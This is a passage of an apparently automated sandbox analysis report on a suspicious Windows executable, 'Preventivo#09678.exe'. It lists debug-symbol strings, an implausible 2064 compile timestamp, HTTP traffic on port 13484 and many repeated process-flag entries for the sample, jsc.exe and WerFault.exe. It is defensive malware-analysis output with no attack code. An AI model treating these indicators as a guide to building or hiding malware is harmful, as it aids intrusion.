                    Source: Binary string: System.Windows.Forms.pdbdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.pdb) source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbe(Syste] source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb0<c source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb/ source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdbs\ source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HC:\Windows\System.Windows.Forms.pdb@ source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Configuration.pdbpx source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.pdbP source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9977000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdbP source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbngI source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Configuration.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Xml.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Drawing.pdbH source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp, Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp, WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: mscorlib.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Windows.Forms.pdbt source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbk source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Windows.Forms.pdbF9E-7F9C-4437-8B11-F424491E3931}\ServerF9C-4437-8B11-F424491E3931}\InprocServer32 source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9977000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Preventivo#09678.exeStatic PE information: 0xB235CF4A [Sun Sep 28 23:42:02 2064 UTC]
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC637963 push ebx; retf 0_2_00007FFAAC63796A
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC710001 push esp; retf 4810h0_2_00007FFAAC710312

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49744
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
